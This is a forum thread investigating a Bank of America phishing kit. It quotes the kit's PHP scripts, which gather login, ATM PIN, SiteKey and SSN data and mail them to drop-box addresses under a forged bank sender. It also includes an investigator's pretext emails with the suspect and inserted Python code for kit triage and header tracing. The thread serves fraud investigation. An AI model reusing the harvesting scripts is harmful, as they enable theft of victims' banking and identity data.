
 MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
[Phishing] Bank of America Phish, caught work in progress.
I was checking out a BOA phish posted by huntermcdole on phishtrack: »/phishtrack?pi···&parts=1 I am looking to see if any wizards out there can review the following data and dig up any additional info or fingerprints on these criminals.
This is a very professional and slick phish, »www.bankofamerica.com.cgi-bin.bo···ller.htm, because in addition to the victim's account data it also seems to create or obtain your SiteKey data. You can enter bogus info on the first page and then see what the SiteKey page is trying to do.
Fortunately while monitoring the phish site I came across the entire upload package from the phisher. They went back and removed the zipped payload within a few hours [Exhibit 1 & 2]. There may be additional unique data that can be found, see attached presentation.zip. Though you obviously cannot see the php scripts on other BOA phishes, I wonder if there are other unique items that could be used to link them to the same author.
Someone more familiar with PHP scripts can confirm whether there are two separate emails going to the phisher: one from "securekey.php" with SiteKey/securekey info going to purisangeh_team@yahoo.com, and a backup to rdcpt0809@airpost.com, with a From of BoA (support[AT]PlatinumBank.com).

```php
<?
//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="") // {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }
session_start();
//USER ACCOUNT
$securityKey1 = $_POST['securityKey1'];
$securityKey1Ans = $_POST['securityKey1Ans'];
$securityKey2 = $_POST['securityKey2'];
$securityKey2Ans = $_POST['securityKey2Ans'];
$securityKey3 = $_POST['securityKey3'];
$securityKey3Ansr = $_POST['securityKey3Ans'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Site Key BoA ip :$ip";
$msg = "Site key From ip :$ip \n------------------- \n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans ";
$from = "From: BoA<support@PlatinumBank.com>";
$to = "purisangeh_team@yahoo.com";
$backup = "rdcpt0809@airpost.com";
mail($to, $subj, $msg, $from, $chk);
mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
?>
```

Another file, "update.php", appears to be mailing the online ID, passcode and ATM info to the same addresses:
```php
<?
if($D1==""||$online_id==""||$passcode==""||$email=="") { if(! ereg ("^.+@.+\\..+$", $email)) {header("Location: GotoErrorAccountPage.htm");return FALSE; }}
if($ssn3=="") { header("Location: GotoErrorSecurityPage.htm");return FALSE; }
if(isset($atm_number) || isset($pin)) { if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin)) { header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];
$ssn2 = $_POST['ssn2'];
$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip \nUSER ACCOUNT \n------------------- \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email \n\nSECURITY QUESTION \n--------------------- \n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>";
$to = "purisangeh_team@yahoo.com";
$backup = "rdcpt0809@airpost.net";
mail($to, $subj, $msg, $from, $chk);
mail($backup, $subj, $msg, $from, $chk);
header("Location: GotoCompletePage.htm");
?>
```

Unfortunately, without figuring out the password to the Yahoo email account there is no way to locate victims. I have never been able to have Yahoo pull an account based on submitting a script snippet showing that it is being used as a data collection tool. I guess it is possible to interfere and load them with bogus data by looking at the way the script formats the mail.
While the Yahoo address is currently valid, it is difficult to check the backup one. Airpost.net appears to be a Canadian company that maybe forwards email, though it appears that there are no current DNS records, so I am not sure if it is active.
The use of purisangeh_team indicates a group operation. Purisangeh may be Indonesian, as indicated by a Google search: »www.google.com/search?hl=en&q=Pu···e+Search I went to the Kaskus site listed at the top of the search looking for posts by the user Purisangeh; however, the forum search function is disabled. It was worth checking because the search shows that it is not a common word. (WARNING: while looking at the Google cache of KASKUS yesterday I got a popup with an attempt to install the WMF exploit. It only happened once, and I have been back several times without incident, but be careful if you go there.)
Since Google showed that "purisangeh" was rather unique, I decided to check out the purisangeh.org that was included in the search return. It is not an active domain; the A record points to Yahoo but looks like it may be pulled. Checking on the registration shows that it was registered in October of 2004 for 5 years to an individual in Cummings, GA, using an email address of purisangeh8181@yahoo.com. Someone in Georgia registering a name like that for 5 years did not seem cool, so I called the registered telephone number, which turned out not to be them. I located a correct number for that name and spoke to the individual. As suspected, they did not register the Purisangeh.org domain. However, in October of '04, at the same time as the registration, their credit card had been hit for hundreds of dollars in fraudulent charges. Their bank notified them that the multiple charges were for all kinds of "Internet services". I am convinced that these are the same criminals.
I am not sure what is going on where the phish is hosted, at cfusa.net. Doesn't the phisher need control of the domain in order to do this? »www.bankofamerica.com.cgi-bin.bo···fusa.net resolves the same as »www.cfusa.net. Notice how the phisher has his own "suspended page" available at »www.bankofamerica.com.cgi-bin.bo···ed.page/ I have seen that exact page format on other phishes. I guess you can fake the account as being closed when the heat is on, slick!!
As recently as December 21st the Google cache of the site showed this: »64.233.187.104/search?q=cache:vI···/+&hl=en Seems a little strange!! The domain has been around for a few years; see archive: »web.archive.org/web/*/http://www.cfusa.net
MGD
P.S. Since preparing this post the phish page now appears to be down; it was down and modified a few times during the research but came back. The directories are all still there.

removed (I'm the bobblehead) Premium,VIP join:2002-02-08 Houston, TX | Re: [Phishing] Bank of America Phish, caught work
To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing, and probably not something that the scammer set up to fool authorities.

huntermcdole Premium join:2005-08-01 Tucson, AZ
edit: January 6th, @04:59PM
reply to MGD: Good to know that they are going down. I have a catch-all account at my domain, so I get a lot of spam and some of them are phishing attempts. That was the first one I have seen where the link almost looked like the real site; most I see are of the 124.15.154.21 type.

MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
reply to removed: said by removed: "To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing,....." Ahh, that explains why I have run across it multiple times. Can we then assume it is a total hack job, because the file is dated the same as the phish folders? He must also have control over the domain DNS in order to have created the subdomain prefix.
MGD

MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
edit: February 3rd, @11:39AM
Interesting follow-up:
Though digging through phishes looking for and extracting the email drop boxes is both tedious and time consuming, what irks me the most is the failure of the majors to yank the accounts despite frequent LARTs. If these drop box accounts were pulled promptly, it would prevent the phished data from being recovered. Now that most of the email providers have forsaken abuse@ and gone to online forms for complaints (Gmail, Yahoo etc.), they have no easy method for reporting them. Getting clueless replies requesting the email headers from the "offending account", despite including snippets from the code clearly identifying the email address as part of a scam, is frustrating. By the time the issue is escalated to a clued rep, the data is long gone.
With that in mind, I sometimes go back a few weeks afterwards and recheck the drop box accounts to see if they were cancelled. In addition to using RCPT TO at the MX server, I also send an email to the address to see if it bounces. I usually include some benign reference to the phish to see if I can elicit a response, and every now and then I get one.
Two days ago I tested the purisangeh_team@yahoo.com drop box on this BOA phish, now over a month old. I always want to include some trigger in the subject line to try and get attention. In this case I listed the subject as "KASKUS", which is an Indonesian chat forum that was one of the few places where the name Purisangeh had turned up as a poster: »www.kaskus.com/member.php?u=69571 Indonesia became a focus since a previous identical BOA phish, which was reported in NANAS on 12/05, was also emailed via the exact same open proxy as this one: »groups.google.com/group/news.adm···e0261745 Coincidentally, that phish site was hosted on a hijacked box in Indonesia.
So I sent off the following email to the phish drop box:
From: Macs Retsub
To: purisangeh_team@yahoo.com
Date: Feb 1, 2006 5:53 PM
Subject: Kaskus
Hey, I still have the files from the Bank of America phish. The address rdcpt0809@airpost.com is dead. Which other one can I use??
I have the logs too.
I try to make them fuzzy, but throw in a few clues, and hope they respond with their guard down. Well, about 24 hours later in pops this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:06 AM
Subject: Re: Kaskus
What are you talking about???
Ahh, got a hit !! so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 12:16 PM
Subject: Re: Kaskus
The data from the credit card and BOA scam: Some of the logs were sent to me by mistake??
```php
if(isset($atm_number) || isset($pin)) { if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin)) { header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1'];
$online_id = $_POST['online_id'];
$passcode = $_POST['passcode'];
$repasscode = $_POST['repasscode'];
$email = $_POST['email'];
$atm_number = $_POST['atm_number'];
$pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];
$ssn2 = $_POST['ssn2'];
$ssn3 = $_POST['ssn3'];
$ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip";
$msg = "Full Info From ip :$ip \nUSER ACCOUNT \n------------------- \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email \n\nSECURITY QUESTION \n--------------------- \n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>";
$to = " purisangeh_team@yahoo.com";
```

I thought that it may break the ice!! or lose him. However, he responded:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 1:28 PM
Subject: Re: Kaskus
By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. Please let me know what can I do for you??
Regard,
Huge
Well! That's a big lie; as I posted above, I checked the address at the time of posting the dig and it was valid, and I also checked it several times afterwards. Yahoo could not have recycled it in a 48 hour period. Besides, is there a waiting list for Purisangeh_Team at Yahoo? In addition, the script files that contained the addy were dated ~12/25. So I responded:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:05 PM
Subject: Re: Kaskus
You need to check again, this account was active on or before January 1, 2006, who is in the "Team" ??
Within twenty minutes I get this back:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 2:24 PM
Subject: Re: Kaskus
How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??
Now I am thinking, is this guy an intern for the Purisangeh Team or what? I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. Well, he lied about the two-week-old email address, so I checked on his honesty by having a look at the mail headers.

```
X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh; Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd; Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99]) by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54; Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub
```

I then did a lookup of IP 222.124.19.29:

```
Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]

inetnum:      222.124.19.16 - 222.124.19.31
netname:      TLKM_D3_AST_DUYA_MEDIA
country:      ID
descr:        PT. DUYA MEDIA
descr:        Public Internet Cafe
descr:        Jl. Buah Batu No. 165D
descr:        Bandung
admin-c:      KI32-AP
tech-c:       KI32-AP
remarks:      ------------------------------------------------------------------
remarks:      Send ABUSE and SPAM reports with plain ASCII text only to
remarks:      **********@yahoo.com cc to *****@telkom.net.id
remarks:      The netname enclosed in square bracket is included in the subject.
remarks:      ------------------------------------------------------------------
status:       ASSIGNED NON-PORTABLE
changed:      ****@telkom.co.id 20050725
mnt-by:       MAINT-TELKOMNET
source:       APNIC

person:       KHAIRIL IMAMI
nic-hdl:      KI32-AP
e-mail:       **********@yahoo.com
address:      Jl. Buah Batu No. 165D
address:      BANDUNG
phone:        +62227319398
country:      ID
changed:      ****@telkom.co.id 20050718
mnt-by:       MAINT-TELKOMNET
source:       APNIC
```
Ha ha, "huge ariando", you are right where I thought you were, and in an internet cafe no less, in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 2:53 PM
Subject: Re: Kaskus
Then why are you now at an Internet Cafe in Bandung?? are you on holidays? What kind of music do you play? what does Purisangeh mean?
I didn't want to blow him away, I wanted to keep him going, so I included an out! Then I got this:
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 3:39 PM
Subject: Re: Kaskus
I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.
BYE.
Ouch!! Yes, I am sort of anonymous; my email is not traceable. I don't want to lose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung; I suspect he may be a student. I try to get him back by alluding to being right there, and throw some local names in.
From: Macs Retsub
To: ariando huge
Date: Feb 2, 2006 4:26 PM
Subject: Re: Kaskus
Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?
Wow!! It took all of 4 minutes to get a reply. Boy, he sure spends a lot of time on the web in an internet cafe for an on-tour "in concert" jazz musician.
From: ariando huge
To: Macs Retsub
Date: Feb 2, 2006 4:30 PM
Subject: Re: Kaskus
are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.
Regard,
Huge
Well, that sure brought him right back, and he is a homeboy; look at that, from a New Zealander to "Apa kabar" all in a few messages. Well, I looked it up: the phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good.
I never replied to the "invitation", as I would have to use a nearby proxy, plus I am now stuck language-wise. I decided to preserve my options and sleep on it. I really just want to get an answer to "What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing?"
MGD
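The two mailer scripts quoted in the first post (one of them re-quoted above) carry several operator-specific strings: the drop-box addresses, the forged From header, the subject template, the Goto*Page.htm redirect names and the list of form fields harvested. Those are exactly the items the first post asked about for linking kits to one author. The following Python triage script is an added example and is not code from the thread or from the kit; it embeds the two scripts from the first post as its input, and the KitReport fields and helper names (analyse, shared_indicators, skeleton_hash) are this example's own. Running it surfaces two things a reader can verify against the quoted code: the backup drop box is rdcpt0809@airpost.com in securekey.php but rdcpt0809@airpost.net in update.php, and securekey.php reads the third answer into $securityKey3Ansr but interpolates $securityKey3Ans into the mail body, so Answer3 only arrives if register_globals fills it in.

```python
"""Triage of a phishing kit's PHP mailer scripts: extract the drop-box
addresses, forged From header, redirect pages and harvested form fields,
and compare two scripts for indicators that tie them to one operator.
Added example for this thread; not code from the kit or the posts."""
import hashlib
import re
from dataclasses import dataclass, field

# Both scripts below are copied from the thread's first post (page
# evidence, not sample data constructed for this example).
SECUREKEY_PHP = r"""<?
//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="") // {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }
session_start();
//USER ACCOUNT
$securityKey1 = $_POST['securityKey1']; $securityKey1Ans = $_POST['securityKey1Ans']; $securityKey2 = $_POST['securityKey2']; $securityKey2Ans = $_POST['securityKey2Ans']; $securityKey3 = $_POST['securityKey3']; $securityKey3Ansr = $_POST['securityKey3Ans']; $ip = $_SERVER["REMOTE_ADDR"];
$subj = "Site Key BoA ip :$ip"; $msg = "Site key From ip :$ip \n------------------- \n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans ";
$from = "From: BoA<support@PlatinumBank.com>"; $to = "purisangeh_team@yahoo.com"; $backup = "rdcpt0809@airpost.com";
mail($to, $subj, $msg, $from, $chk); mail($backup, $subj, $msg, $from, $chk); header("Location: GotoCompletePage.htm");
?>"""

UPDATE_PHP = r"""<?
if($D1==""||$online_id==""||$passcode==""||$email=="") { if(! ereg ("^.+@.+\\..+$", $email)) {header("Location: GotoErrorAccountPage.htm");return FALSE; }}
if($ssn3=="") { header("Location: GotoErrorSecurityPage.htm");return FALSE; }
if(isset($atm_number) || isset($pin)) { if(!ereg("^[0-9]+$",$atm_number) || !ereg("^[0-9]+$",$pin)) { header("Location: GotoErrorVerifyPage.htm"); return FALSE;} }
session_start();
//USER ACCOUNT
$D1 = $_POST['D1']; $online_id = $_POST['online_id']; $passcode = $_POST['passcode']; $repasscode = $_POST['repasscode']; $email = $_POST['email']; $atm_number = $_POST['atm_number']; $pin = $_POST['pin'];
//SECURITY QUESTION
$ssn1 = $_POST['ssn1'];$ssn2 = $_POST['ssn2'];$ssn3 = $_POST['ssn3']; $ip = $_SERVER["REMOTE_ADDR"];
$subj = "Full Info BoA ip :$ip"; $msg = "Full Info From ip :$ip \nUSER ACCOUNT \n------------------- \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email \n\nSECURITY QUESTION \n--------------------- \n\nS S N : $ssn1-$ssn2-$ssn3";
$from = "From: BoA<support@PlatinumBank.com>"; $to = "purisangeh_team@yahoo.com"; $backup = "rdcpt0809@airpost.net";
mail($to, $subj, $msg, $from, $chk); mail($backup, $subj, $msg, $from, $chk); header("Location: GotoCompletePage.htm");
?>"""

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
DROP_RE = re.compile(r'\$(to|backup)\s*=\s*"\s*([^"]*?)\s*"')   # $to / $backup assignments
FROM_RE = re.compile(r'\$from\s*=\s*"From:\s*([^"]*)"')
SUBJ_RE = re.compile(r'\$subj\s*=\s*"([^"]*)"')
LOCATION_RE = re.compile(r'header\s*\(\s*"Location:\s*([^"]+)"')
POST_RE = re.compile(r"\$_POST\[\s*'([^']+)'\s*\]")
MAIL_RE = re.compile(r"\bmail\s*\(")
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'')
COMMENT_RE = re.compile(r"//[^\n]*|/\*.*?\*/", re.S)


@dataclass
class KitReport:
    name: str
    drop_boxes: dict = field(default_factory=dict)   # variable name -> address
    sender: str = ""                                 # forged From header
    subject: str = ""                                # subject template
    redirects: list = field(default_factory=list)    # header("Location: ...") targets
    harvested: list = field(default_factory=list)    # $_POST keys, in order of first use
    mail_calls: int = 0
    skeleton: str = ""                               # structure hash, see skeleton_hash


def strip_comments(php):
    return COMMENT_RE.sub("", php)


def skeleton_hash(php):
    """Hash the code with comments, string literals and whitespace removed, so two
    copies of the same script hash alike even if the operator swapped in new
    addresses, subjects or redirect pages."""
    body = STRING_RE.sub('""', strip_comments(php))
    body = re.sub(r"\s+", "", body)
    return hashlib.sha256(body.encode()).hexdigest()[:16]


def analyse(name, php):
    code = strip_comments(php)   # a commented-out header() must not count as a redirect
    rep = KitReport(name)
    rep.drop_boxes = {var: addr for var, addr in DROP_RE.findall(code)}
    m = FROM_RE.search(code)
    rep.sender = m.group(1) if m else ""
    m = SUBJ_RE.search(code)
    rep.subject = m.group(1) if m else ""
    rep.redirects = sorted(set(LOCATION_RE.findall(code)))
    rep.harvested = list(dict.fromkeys(POST_RE.findall(code)))
    rep.mail_calls = len(MAIL_RE.findall(code))
    rep.skeleton = skeleton_hash(php)
    return rep


def all_addresses(php):
    """Every email literal in the script, including the forged sender."""
    return sorted(set(EMAIL_RE.findall(strip_comments(php))))


def shared_indicators(a, b):
    """Indicators two scripts have in common; any drop box or sender match
    ties them to one operator, a skeleton match means the same template."""
    shared = {}
    boxes = set(a.drop_boxes.values()) & set(b.drop_boxes.values())
    if boxes:
        shared["drop_boxes"] = sorted(boxes)
    if a.sender and a.sender == b.sender:
        shared["sender"] = a.sender
    pages = set(a.redirects) & set(b.redirects)
    if pages:
        shared["redirects"] = sorted(pages)
    if a.skeleton == b.skeleton:
        shared["skeleton"] = a.skeleton
    return shared


if __name__ == "__main__":
    reports = [analyse("securekey.php", SECUREKEY_PHP), analyse("update.php", UPDATE_PHP)]
    for r in reports:
        print(r)
    print("shared:", shared_indicators(*reports))
```

The skeleton hash is deliberately separate from the string indicators: it links two copies of one script even after the drop box changes, while the drop box and From header link different scripts of one kit. Run this over every mailer script in a recovered kit directory and the two sets together give the "fingerprints" the first post asked for.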
Edit=typo+formatting

Ummmyea
@208.17.x.x | How is your email not traceable?

pleekmo (Triptoe Through The Tulips) Premium join:2001-09-14 Manchester, CT
said by Ummmyea: "How is your email not traceable?" Anonymous re-mailer, perhaps. -- HCN: Because you deserve a rest!
I wonder what Spock would have to say (or do) about Omelas?

tapeloop (Light, sweet triceratops.) Premium join:2004-06-27 Airstrip One
reply to MGD: MGD, more power to you, my brother. I wish I knew Bahasa so I could help you slam-dunk this guy. Keep up the good work and keep us posted. -- Copyright infringement is illegal. Murder is illegal. Therefore, file sharing is murder.

daniyel
join:2001-05-10 Tucson, AZ
reply to MGD: Good work - that's the way it's done. I had an instance (a few of them) where we had an AOL employee site posted on our web servers in the middle of the night. By AM, there were already enough hits generated (by emailing internal emp notice/chass pass/update account) to be quite scary, for AOL. I found the creator of the account and the ICQ account the info was being sent to after decrypting a cheesy html algorithm. The hosting company didn't want to do anything except turn the accounts off - and refund charges to stolen CCs. After the 6th-7th account, and getting them turned off rapidly, the phishers went away and bothered some other host.

waldoooo
join:2001-12-15 Fountain Valley, CA
reply to MGD: I like following the threads of MGD & crew as they help "would be" victims and shut down the thieves. I don't know how Yahoo or the other companies work, but it would seem to me that with a few emails to some of the "higher ups" in the companies showing the amount of people helped and scams broken up by MGD and the group here, you guys should be able to get either a phone # or at least a direct email address to a support person who could take action and shut down the fraudulent accounts.

purisangeh
join:2006-02-03 Island, KY
reply to MGD: Re: [Phishing] Bank of America Phish, caught work in progress.
Thank you Macs Retsub for your Big mouth to all pigs here. You want be a hero here? I advice you that wash your feet and take a nap your mommy waiting you.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 2 Feb 2006 16:26:47 -0500
From: "Macs Retsub"
Yahoo! DomainKeys has confirmed that this message was sent by gmail.com.
To: "ariando huge"
Subject: Re: Kaskus
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
around hundreds peoples around you doing spam. Why you not againts them near you ?? I have been seen your people, on my cyber cafe. You do not have enough proof to catch me. I hope I can see you as soon as possible, to disccuss our future. I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet and i just graduated my senior high school. I am hacker? not true I just new baby born in the earth. Please advice me to be nice people.
I hope God Bless you all.
Our Father Who art in Heaven, hallowd be thy name, thy kingdom come .....
I hope you can remember this pray. I am muslim? I am not sure. American is big politic and economy terorist. We are asian lovin' peace.
Love and Peace
Purisangeh (.)(.) -- lick it.

removed (I'm the bobblehead) Premium,VIP join:2002-02-08 Houston, TX | Re: [Phishing] Bank of America Phish, caught work
You must not be that good if ol' MGD found you.

MGD Premium,MVM join:2002-07-31 Fort Lauderdale, FL
edit: February 3rd, @08:32PM
reply to Anon: Re: [Phishing] Bank of America Phish, caught work
I guess someone must have sent you a "HEADS UP"
said by purisangeh: "Thank you Macs Retsub for your Big mouth ...... You want be a hero here?" Hey, that's only a small price that you pay for being a thief and a criminal. Nope, I am not a hero; I just volunteer my time and forensic cyber skills to try and prevent victims from being defrauded.
You are now a member, read my scam hunting posts. I am an "equal opportunity" scam hunter. I follow the trail wherever it leads. Scammers are everywhere, they come in all shapes, sizes, and religions.
....You do not have enough proof to catch me.... Don't bet on it, junior!!! Maybe you will read an article about this in your local paper, Pikiran Rakyat. I am sure that the people of Bandung do not like thieves any more than we do.
I hope I can see you as soon as possible, to disccuss our future....
Sure, just so long as your future includes paying a price for your crimes. I have found your fingerprints on many other phishes, so you have been doing this for a while.
I can create all software using Delphi, Php, Asp, Visual Basic, C++. I am not studying in any university yet..... Great, so why are you using those skills to commit crimes instead of doing productive work? Will the universities let you in if they know what you are doing?
Do not be an idiot and bring race and religion into it. You are a criminal, you got busted!! Face up to it, junior.
You spend a lot of time at that Internet Cafe; do you work or live there?? Your emails came from 3 different IPs at the Cafe within a few hours.
MGD
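The earlier post in this thread traced the reply to Bandung by reading the Received chain from the bottom up: the last Received line is the first hop, and for Yahoo webmail that hop is the "from [client IP] by webNNN via HTTP" line the web frontend stamps at submission. The remark above about three different cafe IPs is the same check repeated over several messages and compared against the APNIC inetnum range. The script below is an added example, not part of any post; it embeds the header block quoted earlier (one header per line, blank and redacted values left as the post shows them) and the inetnum string from the APNIC record, and its function names (originating_ip, spf_result, in_inetnum) are this example's own. The two extra addresses in OBSERVED_IPS are constructed for illustration; the thread names only 222.124.19.29. One caveat the code encodes: only Received lines stamped by a server you trust are reliable, so the search starts from the earliest hop but a SMTP sender can prepend forged lines below the trusted ones; here the SPF pass from Gmail on Yahoo's outbound server is what makes the chain above it credible.

```python
"""Walk the Received chain of a webmail reply to find the submitting
client's IP, read the SPF verdict, and test IPs against an APNIC inetnum
range.  Added example for this thread; not code from the posts."""
import email
import ipaddress
import re

# Headers of the 02 Feb 2006 reply as quoted earlier in the thread, one per
# line; redacted (*******) and blank values are left as the post shows them.
RAW_HEADERS = """X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a
Delivered-To: *******@gmail.com
Received: by 10.48.248.4 with SMTP id v4cs6897nfh; Thu, 2 Feb 2006 01:06:55 -0800 (PST)
Received: by 10.54.128.14 with SMTP id a14mr2115170wrd; Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Return-Path:
Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99]) by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54; Thu, 02 Feb 2006 01:06:55 -0800 (PST)
Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)
DomainKey-Status: good (test mode)
Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
Message-ID:
Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST
Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)
From: ariando huge
Subject: Re: Kaskus
To: Macs Retsub

"""

# From the APNIC record quoted in the thread (inetnum of the Bandung cafe).
CAFE_INETNUM = "222.124.19.16 - 222.124.19.31"

# Constructed for this example: the thread says three different cafe IPs were
# seen but names only 222.124.19.29; the other two are illustrative.
OBSERVED_IPS = ["222.124.19.29", "222.124.19.21", "222.124.19.30"]

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")   # bracketed IP literal


def parse_message(raw):
    return email.message_from_string(raw)


def parse_received(value):
    """Pull the from/by/via tokens and the first bracketed IP out of one Received line."""
    v = re.sub(r"\s+", " ", value).strip()

    def grab(key):
        m = re.search(r"\b%s\s+(\S+)" % key, v)
        return m.group(1).rstrip(";") if m else None

    ips = IP_RE.findall(v)
    return {"from": grab("from"), "by": grab("by"), "via": grab("via"),
            "ip": ips[0] if ips else None, "raw": v}


def hops(msg):
    """Received headers in transit order: the last one in the message is the first hop."""
    return [parse_received(h) for h in reversed(msg.get_all("Received", []))]


def originating_ip(msg):
    """Earliest hop that names a public IP.  For webmail this is the
    'from [client] by webNNN via HTTP' line the provider stamps at submission."""
    for hop in hops(msg):
        if hop["ip"] and ipaddress.ip_address(hop["ip"]).is_global:
            return hop["ip"], hop
    return None, None


def spf_result(msg):
    """(verdict, designated sender IP) from the receiving MX's Received-SPF line."""
    v = msg.get("Received-SPF", "")
    verdict = re.match(r"\s*(\w+)", v)
    ip = re.search(r"designates\s+(\d{1,3}(?:\.\d{1,3}){3})", v)
    return (verdict.group(1).lower() if verdict else None, ip.group(1) if ip else None)


def inetnum_to_networks(inetnum):
    """APNIC 'lo - hi' range -> list of CIDR strings covering it."""
    lo, hi = (ipaddress.ip_address(p.strip()) for p in inetnum.split("-"))
    return [str(n) for n in ipaddress.summarize_address_range(lo, hi)]


def in_inetnum(ip, inetnum):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n) for n in inetnum_to_networks(inetnum))


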